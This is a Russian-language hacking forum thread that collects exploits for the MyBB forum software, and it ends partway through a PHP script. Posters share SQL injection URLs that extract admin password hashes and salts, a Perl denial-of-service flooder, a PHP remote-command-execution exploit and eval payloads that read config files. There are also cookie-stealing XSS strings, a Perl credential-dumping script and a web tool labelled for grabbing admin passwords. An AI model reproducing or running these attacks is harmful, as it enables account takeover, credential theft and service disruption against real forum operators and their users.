Форумы [Обзор уязвимостей myBB]

Discussion in 'Уязвимости CMS/форумов' started by Goudini, 22 Nov 2006.

  1. Goudini

    Goudini Elder - Старейшина

    Joined:
    7 Jun 2006
    Messages:
    132
    Likes Received:
    134
    Reputations:
    91
    MyBB <= 1.00 RC4
    SQL Injection Exploit

    Exploit:
    http://milw0rm.org/exploits/1022
    http://milw0rm.org/exploits/1172

    MyBB 1.0.2
    Название префикса таблиц
    Code:
    http://www.example.com/search.php?s=[de1aaf9b]&action=do_search&keywords=a&srchtype=3
    MyBB 1.03
    SQL-иньекция
    Code:
    http://www.example.com/moderation.php?posts=[pid]|[code]&tid=[pid]&action=do_multimergeposts&sep=hr
    MyBB <= 1.04
    SQL-иньекция

    Exploit:
    http://www.security.nnov.ru/files/mybbex.pl

    MyBB <= 1.1.2
    SQL-иньекция
    Code:
    http://www.example.com/index.php?referrer=9999999999'%20UNION%20SELECT%20password,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9%20FROM%20mybb_users%20WHERE%20uid=1/*
    MyBB 1.1.2
    remote code execution

    Exploit:
    http://www.security.nnov.ru/files/mybibi.pl


    MyBB <= 1.1.3
    Create An Admin Exploit

    Exploit:
    http://milw0rm.org/exploits/1950

    MyBB <= 1.1.5
    'CLIENT-IP' SQL injection / create new admin exploit
    Exploit:
    http://www.security.nnov.ru/files/mybbsipsql.php
     
    9 people like this.
  2. _-[A.M.D]HiM@S-_

    _-[A.M.D]HiM@S-_ Green member

    Joined:
    28 Dec 2005
    Messages:
    441
    Likes Received:
    454
    Reputations:
    696
    *************Внимание - Внимание*****************
    Уважаемые пользователи, стыд да срам. Впредь флуд в этой теме, а также в подобных темах, будет строго наказываться. Это первое и последнее предупреждение.
    *************Внимание - Внимание*****************

    *************Attention - Attention*****************
    Dear users, shame on you. Flood in this and similar themes will be strictly punished from now. It is last warning
    *************Attention - Attention*****************
     
    #2 _-[A.M.D]HiM@S-_, 22 Jan 2007
    Last edited by a moderator: 2 Mar 2007
    3 people like this.
  3. Alex007

    Alex007 New Member

    Joined:
    26 Nov 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    XSS в Punbb<=1.2.14 & Mybb.ru

    XSS в Punbb<=1.2.14 & Mybb.ru

    В профиле в поле веб-сайт идет проверка на наличие "http://", и если этой фигни нет, то она автоматически ставится на первое место. Таким образом, код типа:
    javascript:{while (true) alert('http:// xss дырка')}
    работает.

    Единственное что - плохо, что длинна строки ограничена. Но как минимум хороший сниф можно будет всунуть без изврата с аватарми, да и алертами помучить админа. :)

    Источник: http://forscripts.moy.su/blog/2007-04-10-40
    Пример работы: http://forscripts.3bb.ru/viewtopic.php?pid=9#p9
     
    #3 Alex007, 12 Apr 2007
    Last edited by a moderator: 13 Apr 2007
    3 people like this.
  4. Alex007

    Alex007 New Member

    Joined:
    26 Nov 2006
    Messages:
    2
    Likes Received:
    3
    Reputations:
    0
    Есть Open-Source скрипт MyBB - http://mybboard.net, есть уязвимости скрипта MyBB - http://forscripts.net/vulnerability/vul_mybb, а есть бесплатный сервис форумов MyBB - htto://mybb.ru, который мало что сплагиатил скрипт PunBB, так еще и название скрипта. Уязвимости его здесь - http://forscripts.net/vulnerability/vul_punbb, и выше описанная уязвимость касается именно бесплатного сервиса, а не Опен-Саурс скрипта, о котором и идет речь в этой теме. Так что я немного нефтему написал
     
  5. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    MyBB Search Denial of Service

    Code:
    #!/usr/bin/perl
    #####################################
    # MyBB Search Denial of Service
    # Code Written By ZoL64R 
    # KamikaZ Security Team 
    # ISRAEL
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
        print "#################################################\n";
        print "## MyBB Search Denial of Service\n";
        print "## Discoverd By ZoL64R.\n";
        print "#################################################\n";
        print "## [host] [path] \n";
        print "## host.com /mybb\n";
        print "#################################################\n";
        exit();
    }
    for($i=0; $i<99999; $i++)
    {
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
        $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";
        $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";
        $pack.= "Host: " .$host. "\r\n";
        $pack.= "User-Agent: Googlebot/2.1\r\n";
        $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
        $pack.= "Content-Length: " .length($post). "\r\n\r\n";
        $pack.= $post;
        print $socket $pack;
        syswrite STDOUT, "+";
    }
    
    
     
    _________________________
    #5 ettee, 23 Aug 2007
    Last edited by a moderator: 3 Sep 2008
    1 person likes this.
  6. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    3

    Mybb Hot Editor Plugin Local File Inclusion (keyboard.php)

    MyBB Search Denial of Service:
    Code:
    #!/usr/bin/perl
    #####################################
    # MyBB Search Denial of Service
    # Code Written By ZoL64R 
    # KamikaZ Security Team 
    # ISRAEL
    #####################################
    use IO::Socket;
    
    $host = $ARGV[0];
    $path = $ARGV[1];
    
    if(!$ARGV[1])
    {
        print "#################################################\n";
        print "## MyBB Search Denial of Service\n";
        print "## Discoverd By ZoL64R.\n";
        print "#################################################\n";
        print "## [host] [path] \n";
        print "## host.com /mybb\n";
        print "#################################################\n";
        exit();
    }
    for($i=0; $i<99999; $i++)
    {
        $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "80") or die("[-] Connection faild.\n");
        $post = "action=do_search&keywords=KamikaZ-Team&postthread=1&author=&matchusername=1&forums%5B%5D=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby=lastpost&sorder=desc&showresults=threads&submit=Search";
        $pack.= "POST " .$path. "/search.php HTTP/1.1\r\n";
        $pack.= "Host: " .$host. "\r\n";
        $pack.= "User-Agent: Googlebot/2.1\r\n";
        $pack.= "Content-Type: application/x-www-form-urlencoded\r\n";
        $pack.= "Content-Length: " .length($post). "\r\n\r\n";
        $pack.= $post;
        print $socket $pack;
        syswrite STDOUT, "+";
    }
    
    
    Mybb Change Password Vulnerability
    Code:
    <form action="http://website/mybb_dir/member.php?debug=1"; method="post">
    <table border="0" cellspacing="1" cellpadding="4" class="tborder">
    <tr>
    <td class="trow1" width="40%"><strong>Email Address:</strong></td>
    <td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
    </tr>
    <tr><td wlign=center>
    <input type="hidden" name="action" value="do_lostpw" />
    <input type="submit" class="button" value="Enter Here" />
    </td></tr>
    </table>
    </form>
    Cross site scripting vulnerabilities:

    http://target/mybb/archive/index.php/forum-4.html?GLOBALS[]=1&navbits[][name]=33&navbits[][name]=<script>alert(document.cookie);</script>

    1.2
    inc/generic_error.php?message=<script>alert(document.cookie);</script>
    inc/generic_error.php?message=1&code=<script>alert(document.cookie);</script>

    1.1.7
    /admin/index.php/”><script>alert(1)</script>



    Cross-Site Request Forgery and Cross-Site Scripting (private.php)
    Code:
    First of all user must be REGISTERED and authorized
    - Go to http://target/mybbpath/private.php
    - Inster your xss code for Subject
    'Avatar URL' XSS Vulnerability
    Code:
    javasc ript:alert(123)
    Full path disclosure:

    inc/plugins/hello.php
    inc/generic_error.php?message=1
    inc/datahandlers/event.php
    inc/datahandlers/pm.php
    inc/datahandlers/post.php
    inc/datahandlers/user.php

    1.2.4
    http://[TARGET]/[mybb-directory]/member.php?action[]=registe
    http://[TARGET]/[mybb-directory]/inc/datahandlers/event.php
    http://[TARGET]/[mybb-directory]/captcha.php?imagehash[]=123
     
    _________________________
    2 people like this.
  7. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit


    Code:
    #!/usr/bin/php -q -d short_open_tag=on
    <?php
    
    // magic_quotes_gpc needs to be off
    
    error_reporting(0);
    ini_set("max_execution_time",0);
    ini_set("default_socket_timeout",5);
    
    if ($argc<5) {
    print "-------------------------------------------------------------------------\r\n";
    print "                 MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print "Usage: w4ck1ng_mybb.php [HOST] [PATH] [FORUM_ID] [COMMAND]\r\n\r\n";
    print "[HOST] 	  = Target server's hostname or ip address\r\n";
    print "[PATH] 	  = Path where MyBB is located\r\n";
    print "[FORUM_ID] = Valid forum ID\r\n";
    print "[COMMAND]  = Command to execute\r\n\r\n";
    print "e.g. w4ck1ng_mybb.php victim.com /mybb/ 1 id\r\n";
    print "-------------------------------------------------------------------------\r\n";
    print "            		 http://www.w4ck1ng.com\r\n";
    print "            		        ...Silentz\r\n";
    print "-------------------------------------------------------------------------\r\n";
    die;
    }
    
    //Props to rgod for the following functions
    
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    function sendpacketii($packet)
    {
      global $proxy, $host, $port, $html, $proxy_regex;
      if ($proxy=='') {
        $ock=fsockopen(gethostbyname($host),$port);
        if (!$ock) {
          echo 'No response from '.$host.':'.$port; die;
        }
      }
      else {
    	$c = preg_match($proxy_regex,$proxy);
        if (!$c) {
          echo 'Not a valid proxy...';die;
        }
        $parts=explode(':',$proxy);
        echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
        $ock=fsockopen($parts[0],$parts[1]);
        if (!$ock) {
          echo 'No response from proxy...';die;
    	}
      }
      fputs($ock,$packet);
      if ($proxy=='') {
        $html='';
        while (!feof($ock)) {
          $html.=fgets($ock);
        }
      }
      else {
        $html='';
        while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
          $html.=fread($ock,1);
        }
      }
      fclose($ock);
    }
    
    function make_seed()
    {
       list($usec, $sec) = explode(' ', microtime());
       return (float) $sec + ((float) $usec * 100000);
    }
    
    $host = $argv[1];
    $path = $argv[2];
    $fid  = $argv[3];
    $cmd  = $argv[4];
    $cmd  = urlencode($cmd);
    $port=80;$proxy="";
    
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    
        $sql = "forumdisplay.php?fid=$fid&sortby=']=1;echo%20'*';%20system('$cmd');echo%20'*';%20\$orderarrow['";
        $packet ="GET " . $path . $sql . " HTTP/1.1\r\n";
        $packet.="Host: ".$host."\r\n";
        $packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727;)\r\n";
        $packet.="Connection: Close\r\n\r\n";
        sendpacketii($packet);
    
         $temp=explode("*",$html);
         $temp2=explode("*",$temp[1]);
    
        print "-------------------------------------------------------------------------\r\n";
        print "                MyBB <= 1.2.10 Remote Code Execution Exploit\r\n";    
        print "-------------------------------------------------------------------------\r\n";
        echo  $temp2[0];
        print "-------------------------------------------------------------------------\r\n";
        print "                          http://www.w4ck1ng.com\r\n";
        print "                                 ...Silentz\r\n";
        print "-------------------------------------------------------------------------\r\n";
    
    
    ?>
    
    # milw0rm.com [2008-01-16]

    MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities


    1. Remote Code Execution in "forumdisplay.php":

    Code:
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2&sortby='
    Example attacks:

    Code:
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];phpinfo();exit;//
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];system('ls');exit;//
    http://localhost/mybb.1.2.10/forumdisplay.php?fid=2
    &sortby='];readfile('inc/config.php');exit;//
    2. Remote Code Execution in "search.php":

    Code:
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='
    Example attacks:

    Code:
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];phpinfo();exit;//
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];system('ls');exit;//
    http://localhost/mybb.1.2.10/search.php?action=results&sid=[valid sid here]
    &sortby='];readfile('inc/config.php');exit;//
     
    2 people like this.
  8. Mo4x

    Mo4x VX-эпоха перемен

    Joined:
    18 Feb 2007
    Messages:
    369
    Likes Received:
    194
    Reputations:
    -21
    Multy vuln MyBB (formerly MyBulletinBoard) 1.x

    MyBB (formerly MyBulletinBoard) 1.x

    Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий и произвольные SQL команды в базе данных приложения.

    1) Уязвимость существует из-за недостаточной обработки входных данных в параметре "sortby" в forumdisplay.php и search.php (когда "action" установлен в значение "results") перед использованием в вызове "eval()". Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе. Успешное эксплуатирование уязвимости требует включение знание валидных значений "fid" для forumdisplay.php и значений "sid" для search.php.

    2) Уязвимость существует из-за недостаточной обработки входных данных в параметре массива "mergepost" (когда "action" установлен в значение "do_mergeposts"), "rid" (когда "action" установлен в "allreports"), и "threads" (когда "action" установлен в "do_multimovethreads") в moderation.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных модератора.

    3) Уязвимость существует из-за недостаточной обработки входных данных в параметре "request" и "gid" в admin/usergroups.php (когда "action" установлен в значение "do_joinrequests"). Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Успешное эксплуатирование уязвимости требует наличие учетных данных администратора.
     
    #9 Mo4x, 20 Jan 2008
    Last edited by a moderator: 3 Sep 2008
    3 people like this.
  9. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    Multiple Sql Injections in MyBB 1.2.10

    SQL Injection in "moderation.php" action "do_mergeposts"

    Vulnerable: 1.2.10

    Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "do_mergeposts"
    Далее "waraxe"- имя админа


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 
    &mergepost[war]=1&mergepost[axe]=2
    
    Видим ошибку:

    Code:
    MySQL error: 1054 
    Unknown column 'war' in 'where clause' 
    Query: SELECT p.pid, p.uid, p.fid, p.tid, p.visible, p.message, f.usepostcounts 
    FROM mybb_posts p LEFT JOIN mybb_forums f ON (f.fid=p.fid) 
    WHERE p.tid='0' AND p.pid IN(war,axe) ORDER BY dateline ASC
    
    Из ошибки узнаем префикс таблицы mybb_ - он может отличаться

    Exploit:

    Code:
    http://localhost/mybb.1.2.10/moderation.php?fid=2&action=do_mergeposts 
    &mergepost[-1]=1&mergepost[-2)UNION+ALL+SELECT+1,2,3,4,1,6,
    7+UNION+ALL+SELECT+1, 
    (SELECT+CONCAT(0x5e,username,0x5e,password,0x5e,salt,0x5e,0x27) 
    +FROM+mybb_users+LIMIT+0,1),3,4,1,6,7/*]=2
    
    Ошибка:

    Code:
    MySQL error: 1064 
    You have an error in your SQL syntax; check the manual that corresponds to 
    your MySQL server version for the right syntax to use near ... line 1 
    Query: UPDATE mybb_users SET postnum=postnum-1 
    WHERE uid='^[COLOR=Red]waraxe[/COLOR]^[COLOR=Teal]aff3fcfc70d2a50c3d4c2158233c3901[/COLOR]^[COLOR=Sienna]C5ybEW6b[/COLOR]^''
    
    waraxe - имя админа
    aff3fcfc70d2a50c3d4c2158233c3901 - хэш пароля
    C5ybEW6b - соль

    SQL Injection in "moderation.php" action "allreports"

    Для успешной реализации уязвимости необходимы привилегии модератора


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.
    php?fid=2&action=allreports&rid=0' 
    +UNION+SELECT+waraxe--+
    
    Ошибка:

    Code:
    MySQL error: 1054 
    Unknown column 'waraxe' in 'field list' 
    Query: SELECT COUNT(rid) AS count FROM mybb_reportedposts WHERE 
    rid <= '0' UNION SELECT waraxe-- '
    
    Ошибка используется для выяснения префикса таблицы и далее используется для повышения привилегий от модератора до администратора, аналогично первому примеру.

    SQL Injection in "moderation.php" action "do_multimovethreads"

    Для успешной реализации уязвимости необходимы привилегии модератора, в частности, действие "canmanagethreads"


    PoC:

    Code:
    http://localhost/mybb.1.2.10/moderation.
    php?fid=2&action=do_multimovethreads 
    &moveto=2&threads=war|axe
    
    Ошибка:

    Code:
    MySQL error: 1054 
    Unknown column 'war' in 'where clause' 
    Query: SELECT fid, visible, replies, unapprovedposts FROM mybb_threads 
    WHERE tid IN (war,axe)
    
    Ошибка используется для выяснения префикса таблицы и далее используется для повышения привилегий от модератора до администратора, аналогично первому примеру.
     
  10. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    Delete PM's XSRF Vuln

    MyBB 1.2.11
     
    _________________________
    #11 halkfild, 22 Jan 2008
    Last edited by a moderator: 3 Sep 2008
    4 people like this.
  11. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    mybb1.2.11 [disablesmilies] Remote SQL-injection Exploit



    MyBB <= 1.2.11 [disablesmilies] Remote SQL-injection Exploit

    Author: Janek Vind, [waraxe-2008-SA#064], 21. January 2008, Estonia, Tartu, http://www.waraxe.us/advisory-64.html

    Авторизуйтесь на форуме чтоб получить валидную куку в браузер, после чего впишите в поля свой ID и ник.

    За одно нажатие вы отправите самому себе два сообщения, одно формальное, а второе - с логином и паролем админа.

    Если в таблице сессий есть валидная сессия - можете получить её оттуда и поадминить форумом без пасса.
    Напоминаю, что привязка по айпи обходилась раньше через CLIENT-IP.

    [ i ] Password algoritm : md5(md5($salt).md5($password))

     

    Attached Files:

  12. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    174
    Likes Received:
    215
    Reputations:
    8
    MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

    MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit

    Code:
    #!/usr/bin/perl
    
    #
    # MyBB <=1.2.11 SQL Injection Exploit based on http://www.waraxe.us/advisory-64.html
    #
    # Needs MySQL >=4.1 and a valid registration.
    #
    # By F
    #
    
    use IO::Socket;
    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTML::Entities;
    
    ####
    
    	print("\n");
    	print("############################################################################\n");
    	print("#                 MyBB <=1.2.11 SQL Injection Exploit by F                 #\n");
    	print("############################################################################\n");
    
    if(@ARGV<5){
    	print("# Usage: perl mybb1211.pl host path user pass victim_uid [last_victim_uid] #\n");
    	print("############################################################################\n");
    	exit;
    };
    
    $host="http://".$ARGV[0];
    $path=$ARGV[1];
    $user=$ARGV[2];
    $pass=$ARGV[3];
    $vid1=$ARGV[4];
    
    if(@ARGV<=5){
    	$vidn=$vid1;
    }else{
    	$vidn=$ARGV[5];
    };
    
    print("\n");
    print(" [~] Host: ".$host."\n");
    print(" [~] Path: ".$path."\n");
    print(" [~] User: ".$user."\n");
    print(" [~] Pass: ".$pass."\n");
    print(" [~] From  #".$vid1."\n");
    print(" [~] To    #".$vidn."\n");
    print("\n");
    
    ####
    
    # create $browser and $cookie_jar
    $browser=LWP::UserAgent->new() or die(" [-] Cannot create new UserAgent\n");
    $cookie_jar=HTTP::Cookies->new();
    $browser->cookie_jar($cookie_jar);
    
    # try to log in
    $result=$browser->post(
    	$host.$path."member.php",
    	Content=>[
    		"action"=>"do_login",
    		"username"=>$user,
    		"password"=>$pass,
    		"url"=>$host.$path."index.php",
    		"submit"=>"Login",
    	],
    );
    
    # check cookie
    if($cookie_jar->as_string=~m/mybbuser=.*?;/){
    	print(" [+] Login successful\n");
    }else{
    	print(" [-] Login unsuccessful\n");
    	exit;
    };
    
    # try to get uid
    $result=$browser->get($host.$path."usercp.php");
    
    # check result
    if($result->as_string=~m/member\.php\?action=profile&amp;uid=([0-9]*?)"/){
    	$uid=$1;
    	print(" [+] Getting uid successful: ".$uid."\n");
    }else{
    	print(" [-] Getting uid unsuccessful\n");
    	exit;
    };
    
    # construct exploit
    $exploit ="yes','0','0'),";
    $exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_result','0',concat('(haxx_start)',";
    for($vid=$vid1;$vid<=$vidn;$vid++){
    	$exploit.="ifnull((select concat(uid,'-',username,':',password,':',salt,'::',email,'-',usergroup,'-',additionalgroups,'-',website,'-',regip,'(haxx_delim)') from mybb_users where uid=".$vid."),''),";
    };
    $exploit.="'(haxx_end)'),'".time()."','0','no','yes','0','0'),";
    $exploit.="('".$uid."','".$uid."','".$uid."','1','haxx_message=0','0','nuthin0','".time()."','0','no','yes";
    
    # try to send exploit
    $result=$browser->post(
    	$host.$path."private.php",
    	Content=>[
    		"action"=>"do_send",
    		"subject"=>"haxx_message=".(1+rand(65536)),
    		"message"=>"nuthin".(1+rand(65536)),
    		"to"=>$user,
    		"options[disablesmilies]"=>$exploit,
    	],
    );
    
    # check if user is valid
    if(	($result->as_string=~m/Your account has either been suspended or you have been banned from accessing this resource./) ||
    	($result->as_string=~m/You do not have permission to access this page./) ||
    	($result->as_string=~m/Your account may still be awaiting activation or moderation./)
    ){
    	print(" [-] User has no permission to send private messages. This can happen if the user is suspended, banned, unactivated, or for other similar reasons.\n");
    	exit;
    };
    
    # check the 5 minute cap
    if($result->as_string=~m/You have already submitted the same private message to the same recipient within the last 5 minutes./){
    	print(" [-] Unsuccessful attempt to fool MyBB with the 5 minute limit on sending private messages. Please run the exploit again.\n");
    	exit;
    };
    
    # check if it successfully sent the messages -> REMOVED, does not work on some installations
    #if($result->as_string=~m/Thank you, your private message has successfully been sent./){
    	print(" [+] Sending messages was successful.\n");
    #}else{
    #	print(" [-] Sending messages was unsuccessful.\n");
    #	print($result->as_string);
    #	exit;
    #};
    
    # delete auxiliary messages
    print(" [+] Deleting auxiliary messages.\n");
    $result=$browser->get($host.$path."private.php?fid=1");
    while($result->as_string=~m/private\.php\?action=read&amp;pmid=([0-9]*?)">haxx_message=[0-9]*?</g){
    	$pmid=$1;
    	$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
    	$result=$browser->get($host.$path."private.php?fid=1");
    };
    
    # download and delete messages
    print(" [+] Exploit successful.\n");
    print("\n");
    
    
    while($result->as_string=~m/private\.php\?action=read&amp;pmid=([0-9]*?)">haxx_result</g){
    	$pmid=$1;
    	$result=$browser->get($host.$path."private.php?action=read&pmid=".$pmid);
    	if($result->as_string=~m/\(haxx_start\)(.*)\(haxx_end\)/){
    		$pm=$1;
    		$pm=~s/\(haxx_delim\)/\n/g;
    		$pm=decode_entities($pm);
    		print($pm);
    	};
    	$result=$browser->get($host.$path."private.php?action=delete&pmid=".$pmid);
    	$result=$browser->get($host.$path."private.php?fid=1");
    };
    # milw0rm.com
     
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability

    MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability

    Code:
    ###################################################################################
    #										  #
    # MyBulletin Board (MyBB) Plugin "Custom Pages 1.0" - SQL Injection Vulnerability #
    #										  #
    #    found by: Lidloses_Auge 							  #
    #    Contact (ICQ):  120946783							  #
    #    Greetz to: free-hack.com							  #
    #										  #
    ###############################################################################################################################################
    #																	      #
    # Vulnerability:															      #
    #																	      #
    #    Document:      pages.php														      #
    #    GET-Parameter: page														      #
    #																	      #
    # Dork:																	      #
    #																	      #
    #    inurl:"pages.php" + intext:"powered by mybb"											      #
    #																	      #
    # Example:																      #
    #																	      #
    #    http://[target]/pages.php?page='union/**/select/**/1,unhex(hex(concat_ws(0x202d20,username,password))),3,4,5,6,7/**/FROM/**/mybb_users/* #
    #																	      #
    # Notes:																      #
    #																	      #
    #    Successrate depends on the permissions which could be set for viewing the 'page'						              #
    #																	      #
    ###############################################################################################################################################
    
    # milw0rm.com [2008-04-06]
     
  14. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    как определить версию myBB

    /install/resources/settings.xml
    Пример:
    HTML:
    <settings version="122" exported="1129013345">

    /install/resources/mybb_theme.xml
    Пример:
    HTML:
    <?xml version="1.0" encoding="UTF-8"?>
    <theme name="MyBB Master Style" version="122">
     
  15. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    MyBulletinBoard (MyBB) <= 1.2.11 private.php SQL Injection Exploit (2 или 3)

    http://milw0rm.com/exploits/6316

    PHP:
    <?php
    // forum mybb <= 1.2.11 remote sql injection vulnerability
    // bug found by Janek Vind "waraxe" http://www.waraxe.us/advisory-64.html
    // exploit write by c411k (not brutforce one symbol. insert hash in your PM in one action)
    //
    //        POST http://mybb.ru/forum/private.php HTTP/1.1
    //        Host: mybb.ru
    //        Cookie: mybbuser=138_4PN4Kn2BNaKOjo8ie4Yl2qadG77JTIeQyRoEAKgolr7uA55fZW
    //        Content-Type: application/x-www-form-urlencoded
    //        Content-Length: 479
    //        Connection: Close
    //
    //        to=c411k&message=co6ako_ykycuJIo&options[disablesmilies]=',null,null),(138,138,138,1,'with+<3+from+ru_antichat',9,concat_ws(0x3a,'username:password:salt+>',(select+username+from+mybb_users+where+uid=4),(select+password+from+mybb_users+where+uid=4),(select+salt+from+mybb_users+where+uid=4),admin sid',(select+sid+from+mybb_adminsessions+where+uid=4),'admin loginkey',(select+loginkey+from+mybb_adminsessions+where+uid=4)),1121512515,null,null,'yes',null,null)/*&action=do_send
    //    
    // greets all https://forum.antichat.ru :) b00zy/br 32sm. <====3 oO :P ( .)(. ) :D :| root@dblaine#cat /dev/legs > /dev/mouth
    // and http://expdb.cc/?op=expdb (welcome to our priv8 exploits shop, greetz to all it's members)*
    // 25.01.08

    error_reporting(0);
    @
    ini_set("max_execution_time",0);
    @
    ini_set('output_buffering',0);
    @
    set_magic_quotes_runtime(0);
    @
    set_time_limit(0);
    @
    ob_implicit_flush(1);

    header("Content-Type: text/html; charset=utf-8\r\n");
    header("Pragma: no-cache");

    ?>

    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>mybb 1.2.11 xek</title>
    <style>
    <!--
    A:link {COLOR: #B9B9BD; TEXT-DECORATION: none}
    A:visited {COLOR: #B9B9BD; TEXT-DECORATION: none}
    A:active {COLOR: #228B22; TEXT-DECORATION: none}
    A:hover {COLOR: #E7E7EB; TEXT-DECORATION: underline}
    BODY
    {
        margin="5";
        FONT-WEIGHT: normal; 
        COLOR: #B9B9BD; 
        BACKGROUND: #44474F; 
        FONT-FAMILY: Courier new, Courier, Verdana, Arial, Helvetica, sans-serif; 
    }

    -->
    </style>
    </head>
    <body>

    <?php

    function myflush($timee)
    {
        if(
    ob_get_contents())
        {
            
    ob_flush();
            
    ob_clean();
            
    flush();
            
    usleep($timee);
        }
    }

    if (!
    $_GET)
    {
        echo 
        
    '<form action="'.$_SERVER['PHP_SELF'].'?fuck_mybb" method="post">
        <input style="background-color: #31333B; color: #B9B9BD; border-color: #646C71;" type="submit" value=" get admin passwd... "><br><br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="hostname" value="hostname">
        <font color="#B9B9BD"> ¬ for expamle "expdb.cc"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="patch" value="patch">
        <font color="#B9B9BD"> ¬ patch 2 mybb forum, for expamle "community/mybb"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="username" value="username">
        <font color="#B9B9BD"> ¬ you username on this forum, for expamle "c411k"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="pwd" value="password">
        <font color="#B9B9BD"> ¬ you password, for expamle "h1world"<br>
        <input style="background-color: #31333B; color: #B9B9BD;" name="uid_needed" value="1">
        <font color="#B9B9BD"> ¬ admin id, default 1<br>
        </form>'
    ;
    }


    if (isset(
    $_GET['fuck_mybb']))
    {
    $username = ($_POST['username']);
    $pwd = ($_POST['pwd']);
    $host_mybb = ($_POST['hostname']);
    $patch_mybb = ($_POST['patch']);
    $uid_needed = ($_POST['uid_needed']);
    $login_mybb 'member.php';
    $pm_mybb 'private.php';
    $data_login 'username='.$username.'&password='.$pwd.'&submit=Login&action=do_login&url=http%3A%2F%2Flocalhost%2Fmybb_1210%2Findex.php';

    function 
    sendd($host$patch$scr_nm$method$data_gp$cook1e)
    {
        global 
    $send_http;
        
    $s = array();
        
    $url fsockopen($host80);
        
    $send_http  "$method http://$host/$patch/$scr_nm HTTP/1.1\r\n";
        
    $send_http .= "Host: $host\r\n";
        
    $send_http .= "User-Agent: Mozilla/5.0 (oO; U; oO zzzz bzzzz brrr trrr; ru; rv:1.8.1.4) Gecko/20180515 Firefox/1.3.3.7\r\n";
        
    $send_http .= "Cookie: $cook1e\r\n";
        
    $send_http .= "Content-Type: application/x-www-form-urlencoded\r\n";
        
    $send_http .= "Content-Length: ".strlen($data_gp)."\r\n";
        
    $send_http .= "Connection: Close\r\n\r\n";
        if (
    $method === 'POST')
        {
            
    $send_http .= $data_gp;
        }
        
    //print_r($send_http);
        
    fputs($url$send_http);
        while (!
